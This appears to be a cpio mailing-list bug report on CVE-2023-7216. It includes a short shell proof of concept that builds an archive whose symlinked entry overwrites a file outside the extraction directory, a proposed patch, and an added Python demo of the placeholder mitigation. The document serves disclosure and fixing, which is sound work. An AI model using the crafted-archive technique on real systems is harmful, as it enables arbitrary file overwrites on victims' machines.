Dear cpio maintainer: 
                 
        This is a Red Hat Community Report on 
CVE-2023-7216: https://bugzilla.redhat.com/show_bug.cgi?id=2249901 
         
        CVE-2023-7216 can cause path traversal when opening a cpio archive, 
which can lead to malicious file overwrites of arbitrary directories. 
         
        The Red Hat PoC for CVE-2023-7216 can be reproduced using the following 
method: 
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd  testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```
        First of all, I would like to confirm with you: do you accept 
CVE-2023-7216? Is CVE-2023-7216 a bug, or is it the default behavior of the cpio 
software? 
        If CVE-2023-7216 is a bug, I have tried to provide a fix patch. Of course, if 
there is a better fix, please point it out. 
         
        CVE-2023-7216 is similar to CVE-2015-1197; both of them use a symlink to 
cause path traversal. The CVE-2015-1197 fix uses symlink_placeholder() to fix a 
path traversal issue in the --no-absolute-filenames scenario. However, 
CVE-2023-7216 proves that path traversal also exists in other scenarios. 
         
        So I made a patch to fix CVE-2023-7216: copyin_link() should enable 
symlink_placeholder() by default, not only when the --no-absolute-filenames 
option is on. 
         
        I look forward to your feedback and suggestions soon. 
         
Best Regards, 
Peng 
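The following is an added example written for this page; it is not part of the thread above and not cpio's code. It models the two extraction strategies the message contrasts on a constructed two-entry "archive" shaped like the PoC (a symlink named `tmp` pointing outside the extraction directory, followed by a regular file `tmp/trav.txt`). `extract_naive` creates entries in archive order and lets the file escape through the link; `extract_deferred` imitates the symlink-placeholder idea attributed to cpio's `symlink_placeholder()` (a zero-length regular file stands in for each symlink until the whole archive has been processed, so nothing can be written through the link), then swaps the real symlinks in at the end. A temporary `outside` directory stands in for `/tmp`, so the example never touches the real `/tmp`; the entry format, function names and the placeholder details are this example's own assumptions, not cpio's internals.

```python
"""Symlink-based path traversal during archive extraction, and the
deferred-symlink (placeholder) mitigation, on a constructed archive.

Added example, not cpio's code. The entry list mirrors the PoC in the
message above: a symlink `tmp` pointing outside the extraction directory,
followed by a regular file `tmp/trav.txt`.
"""
import os
import tempfile


def make_entries(outside_dir):
    """Constructed archive: (name, kind, payload) tuples in archive order.
    `payload` is the link target for symlinks, the contents for files."""
    return [
        ("tmp", "symlink", outside_dir),          # like `ln -sf /tmp/ testcpio/tmp`
        ("tmp/trav.txt", "file", b"TEST Traversal\n"),  # the renamed tmpYtrav.txt
    ]


def _write_file(path, data):
    """Create parent directories and write a regular file.
    Raises NotADirectoryError if a parent is a regular file (a placeholder)."""
    parent = os.path.dirname(path)
    if os.path.lexists(parent) and not os.path.isdir(parent):
        raise NotADirectoryError(parent)   # placeholder or file sits where a dir is needed
    os.makedirs(parent, exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def extract_naive(entries, dest):
    """Create each entry immediately, in archive order (the vulnerable shape).
    Once `tmp` exists as a symlink, `tmp/trav.txt` is written through it."""
    for name, kind, payload in entries:
        path = os.path.join(dest, name)
        if kind == "symlink":
            os.symlink(payload, path)
        else:
            _write_file(path, payload)
    return []


def extract_deferred(entries, dest):
    """Placeholder strategy (assumed to follow the idea of cpio's
    symlink_placeholder()): while entries are being created, every symlink
    is represented by an empty regular file, so a later entry cannot be
    written *through* it. Entries that would need the placeholder to be a
    directory are skipped and reported; the real symlinks are created last."""
    deferred, skipped = [], []
    for name, kind, payload in entries:
        path = os.path.join(dest, name)
        if kind == "symlink":
            open(path, "wb").close()          # zero-length placeholder
            deferred.append((path, payload))
            continue
        try:
            _write_file(path, payload)
        except NotADirectoryError:
            skipped.append(name)              # would have traversed the link
    for path, target in deferred:             # now replace placeholders
        os.unlink(path)
        os.symlink(target, path)
    return skipped


def run_demo():
    """Run both extractors on the constructed archive in throwaway dirs.
    Returns (naive_escaped, deferred_escaped, skipped): whether trav.txt
    landed in the `outside` directory under each strategy, and which
    entries the deferred extractor refused."""
    results = []
    for extractor in (extract_naive, extract_deferred):
        with tempfile.TemporaryDirectory() as root:
            outside = os.path.join(root, "outside")   # stands in for /tmp
            dest = os.path.join(root, "dest")
            os.mkdir(outside)
            os.mkdir(dest)
            skipped = extractor(make_entries(outside), dest)
            escaped = os.path.exists(os.path.join(outside, "trav.txt"))
            results.append((escaped, skipped))
    (naive_escaped, _), (deferred_escaped, skipped) = results
    return naive_escaped, deferred_escaped, skipped


if __name__ == "__main__":
    naive, deferred, skipped = run_demo()
    print("naive extractor escaped dest:   ", naive)
    print("deferred extractor escaped dest:", deferred)
    print("entries refused by deferred:    ", skipped)
```

Running it shows the naive extractor writing `trav.txt` into the outside directory, while the deferred extractor refuses `tmp/trav.txt` because its parent is still a placeholder file when the entry arrives; the symlink itself is only created after every other entry has been handled, which is why enabling the placeholder path unconditionally, rather than only under --no-absolute-filenames, closes this variant.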




------------------ Original ------------------
From: "2773414454" <[email protected]>
Date: Tue, Feb 20, 2024 11:03 AM
To: "bug-cpio" <[email protected]>
Subject: Is there a fix for this CVE-2023-7216?



Dear cpio maintainer:


    https://nvd.nist.gov/vuln/detail/CVE-2023-7216 
    NVD does not provide any related patch information. 
 
    Is there a fix for cpio's CVE-2023-7216? 
      [1] If not, what is the repair plan for cpio? 
      [2] If yes, can you indicate which submissions fix CVE-2023-7216?


peng

Attachment: 0001-deafult-use-symlink_placeholder-to-fix-Path-Traversa.patch.txt
Description: Binary data
